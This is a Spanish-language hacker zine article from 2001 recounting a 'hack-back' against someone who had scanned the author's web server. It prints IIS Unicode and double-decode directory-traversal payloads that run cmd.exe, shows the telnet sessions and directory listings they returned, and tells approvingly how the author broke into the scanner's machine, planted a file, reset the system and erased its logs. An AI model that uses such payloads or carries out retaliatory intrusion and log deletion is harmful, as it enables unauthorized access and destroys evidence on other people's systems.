-=-( - La ley del  Talión - )-==-( - ANÓNIMO - )-==-(- DTF-Zine #2 -)-=-

  Introducción:
  -------------

  Como  todos  sabréis, hay  una ola  de  script  kiddies (gente  que usa los
 programas  que existen   sin saber qué hacen)  que hace poco asolaron muchas
 webs que  tenían  el bug  IIS  Unicode  o Decode. Sí, estos  kiddies  siguen
 atacando, ejecutan  su  programa, especifican un rango de IP´s y  empiezan a
 scannear, cuando  encuentran un servidor  vulnerable, lo dejan inservible en
 vez de reportarlo a los administradores.

  He dedicido llamar a este documento, texto o como  queráis llamarlo la  ley
 del Talión. Esta "ley" se creó en Mesopotamia (tierra entre dos ríos)  y  se
 decía: ojo por ojo, diente por diente. Si  me haces algo yo te  lo devuelvo,
 cosa que no cumplí en este caso. Espero que os parezca al menos interesante.


  Empieza el "ataque":
  --------------------

  Esto es un hecho verídico. Todo comenzó una noche  a la 1:20  de la mañana.
 Acababa de instalar el  Apache, PHP y MySQL  para hacer pruebas de Web. Como
 todos sabréis,  mucha gente usa un scanner en donde se pone el rango de IP´s
 a scannear y si encuentran algo, intentan entrar.

  Esta persona, supongo yo, ya  que es el programa  que conozco  bajo Windows
 que  más gente  usa, usaba el SSH Scanner.  Me  intentó  entrar probando las
 típicas cadenas, como por ejemplo:

 /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+

  Bien, cerré el  apache y empecé a mirar el log "access", pude ver que mucha
 gente  intentó entrar, bueno, decidí mirar la última IP y databa  de hacía 5
 minutos.  Pasé el nmap a  esa IP y encontró el puerto 80 y el puerto 139, me
 quedé extrañado.  Era un  Windows 2000,  IIS y una red, nada  más  inseguro.
 Conecté por telnet al puerto 80 y saqué esto:

  Contrarrestando el ataque
  -------------------------

 xx@xx#~:telnet xxx.xx.xx.x 80 (IP omitida).

 GET HTTP 1.1 / HTML
 HTTP/1.1 200 OK
 Server: Microsoft-IIS/5.0
 Date: Thu, 01 Nov 2001 01:34:51 GMT
 Content-Type: application/octet-stream
 Volume in drive C is WINDOWS2000
 Volume Serial Number is 1048-629A

  Bueno, pensé, IIS, por probar no pierdo nada, así que hice esto:

 xx@xx#~:telnet xxx.xx.xx.x 80

 GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
 HTTP/1.1 200 OK
 Server: Microsoft-IIS/5.0
 Date: Thu, 01 Nov 2001 01:34:51 GMT
 Content-Type: application/octet-stream
 Volume in drive C is WINDOWS2000
 Volume Serial Number is 1048-629A

 Directory of c:\

 10/09/2001 11:45a <DIR> $LDCFG$
 10/01/2001 05:43p <DIR> Documents and Settings
 10/01/2001 05:43p <DIR> DRIVERS
 10/03/2001 08:06a <DIR> IMNnq_NT
 10/01/2001 05:28p <DIR> Inetpub
 10/31/2001 03:37p <DIR> LDClient
 10/08/2001 03:46p <DIR> Program Files
 11/01/2001 01:15a <DIR> space
 11/01/2001 02:07a <DIR> temp
 10/09/2001 11:11a <DIR> WINNT
 2 File(s) 40,022 bytes
 10 Dir(s) 381,834,752 bytes free

  Comenzando la represalia:
  -------------------------

  Empecé a pensar, me dije, veamos, esta persona me ha intentado entrar no ha
 podido, tengo su PC delante de mis ojos, ¿qué hago? Pues  nada  fuera  de lo
 normal, simplemente le dejé un fichero en donde  ponía mi e-mail  y mi nick,
 reseteé su  Windows 2000 y supongo que vio el fichero, ya que estaba en raiz
 (C:\),  el ataque  fue  desde  una  empresa.  Así quedó su ordenador después
 de que entrase yo:

 Directory of c:\

 10/09/2001 11:45a <DIR> $LDCFG$
 10/01/2001 05:43p <DIR> Documents and Settings
 10/01/2001 05:43p <DIR> DRIVERS
 01/10/2001 01:30a 4,422 xx was here my e-mail is xx@xx
 10/03/2001 08:06a <DIR> IMNnq_NT
 10/01/2001 05:28p <DIR> Inetpub
 10/31/2001 03:37p <DIR> LDClient
 10/08/2001 03:46p <DIR> Program Files
 11/01/2001 01:15a <DIR> space
 11/01/2001 02:07a <DIR> temp
 10/09/2001 11:11a <DIR> WINNT
 2 File(s) 40,022 bytes
 10 Dir(s) 381,834,752 bytes free

  La  moraleja de  todo esto  es que no  uséis cosas  por usar,  aprended  su
 funcionamiento y  ya  después podréis  usar estos programas para facilitaros
 la vida, pero al menos sabéis lo que hacen.

  Tenéis una captura del  listado de  directorios y ficheros de esta persona.
 Por cierto, el log de ese ordenador fue eliminado. Ah, se me olvidaba decir,
 como   veis el  tamaño del  fichero  que  creé  es muy grande,  lo único que
 hice fue  cambiarle   el nombre a   otro fichero de ese  tamaño. Por cierto,
 he eliminado 1 de los ficheros que aparecen en la captura y en el texto, ya 
 que viendo ese fichero, podriais saber de que empresa se trataba.

  Despedida:
  ----------

  Bueno, aquí ha acabado mi "documento" o explicación de cómo pueden atacarte
 sin  motivo alguno,  sólo  por estar  dentro de ese  rango de IP. Muchos  me
 insultarán por haber escrito este texto, pensarán que  soy un  script-kiddie
 o algo peor, pensad lo que queráis, no es que me moleste mucho y sois libres
 para pensar lo que os plazca.